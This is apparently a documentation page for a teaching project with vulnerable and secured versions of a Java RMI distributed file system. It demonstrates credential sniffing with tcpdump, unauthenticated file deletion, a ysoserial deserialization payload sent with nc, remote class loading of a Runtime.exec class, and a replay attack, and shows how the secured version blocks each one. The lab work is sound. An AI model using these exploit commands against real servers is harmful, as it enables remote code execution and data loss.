Attack Demonstrations

This page shows how to exploit each vulnerability against the vulnerable version, then verify the fix in the secured version.

Setup — Run the Vulnerable Stack

# Terminal 1
java -jar target/secure-dfs-1.0-vuln-auth.jar
# Output: [WARNING] VulnerableAuthService running WITHOUT TLS!

# Terminal 2
java -jar target/secure-dfs-1.0-vuln-node.jar 0 1099
# Output: [VULN] java.rmi.server.useCodebaseOnly = false (Vulnerability 2 active)

# Terminal 3
java -jar target/secure-dfs-1.0-vuln-client.jar
# Output: [VulnClient] WARNING: Connecting WITHOUT TLS

Demo 1 — Sniff Credentials (Vulnerability 3: Plaintext Transport)

# In a 4th terminal, capture traffic:
sudo tcpdump -i lo -A 'tcp port 1098' 2>/dev/null | strings | grep -E "token|password|user"

Now log in through the vulnerable client. Watch the tcpdump terminal:

username: testuser
password: secret123
token: 550e8400-e29b-41d4-a716-446655440000

With the secure stack: Run the same tcpdump — only encrypted bytes, no readable text.

Demo 2 — Unauthenticated Access (Vulnerability 4: Missing Auth)

Any client can call handleClientOperation with a null or fake token and it works:

// Compile and run this against the vulnerable node (port 1099)
ReplicaNodeInterface node = (ReplicaNodeInterface) Naming.lookup("//localhost:1099/ReplicaNode0");
FileOperation op = FileOperation.delete("important.pdf", "attacker");
OperationResult result = node.handleClientOperation(op, null);
System.out.println(result.getMessage());  // "File deleted successfully."

With the secure stack: Returns "Unauthorized: invalid session token."

Demo 3 — Deserialization RCE (Vulnerability 1)

# 1. Start a listener on the attacker's machine
nc -lp 9999 &

# 2. Generate a CommonsCollections6 gadget chain payload
java -jar ysoserial.jar CommonsCollections6 "touch /tmp/pwned" | nc localhost 1099

# 3. Check the server
cat /tmp/pwned  # File created by the server's JVM — RCE confirmed

With the secure stack: SerializationValidator throws InvalidClassException before the payload deserializes.

Demo 4 — Remote Class Injection (Vulnerability 2)

# 1. Attacker hosts a malicious class on an HTTP server
echo 'public class Malicious implements java.io.Serializable {
    static { try { Runtime.getRuntime().exec("touch /tmp/remote_pwned"); } catch(Exception e) {} }
}' > Malicious.java
javac Malicious.java
python3 -m http.server 8888 &

# 2. Attacker sends an RMI call referencing the remote codebase
# The vulnerable server (useCodebaseOnly=false) downloads and executes Malicious.class
java -cp out attacker.Attacker2_RemoteCodebase

# 3. Check the server
ls /tmp/remote_pwned  # File created — RCE confirmed

With the secure stack: useCodebaseOnly=true — the codebase URL is ignored. ClassNotFoundException is thrown.

Demo 5 — Replay Attack (Vulnerability 5)

cd vulnerable
java -cp out attacker.Attacker5_ReplayAttack

What happens:

Legitimate upload of config.txt v1
Legitimate upload of config.txt v2 (update)
Attacker replays v1 upload
config.txt silently reverts to v1 — data loss without detection

With the secure stack: The NonceStore detects the duplicate nonce and returns "REPLAY_REJECTED".

Demo 6 — Consistency Verification

TO-Multicast ensures all replicas stay in sync even with concurrent writes:

# With the secure stack running:
# Terminal A — upload fileA.txt
# Terminal B — simultaneously upload fileB.txt

# Check all three nodes:
ls storage/node0/ storage/node1/ storage/node2/

# Both files appear in the SAME order on all three nodes

Verification Checklist

Before a discussion or presentation, verify:

Next: → Glossary

Setup — Run the Vulnerable Stack​

Demo 1 — Sniff Credentials (Vulnerability 3: Plaintext Transport)​

Demo 2 — Unauthenticated Access (Vulnerability 4: Missing Auth)​

Demo 3 — Deserialization RCE (Vulnerability 1)​

Demo 4 — Remote Class Injection (Vulnerability 2)​

Demo 5 — Replay Attack (Vulnerability 5)​

Demo 6 — Consistency Verification​

Verification Checklist​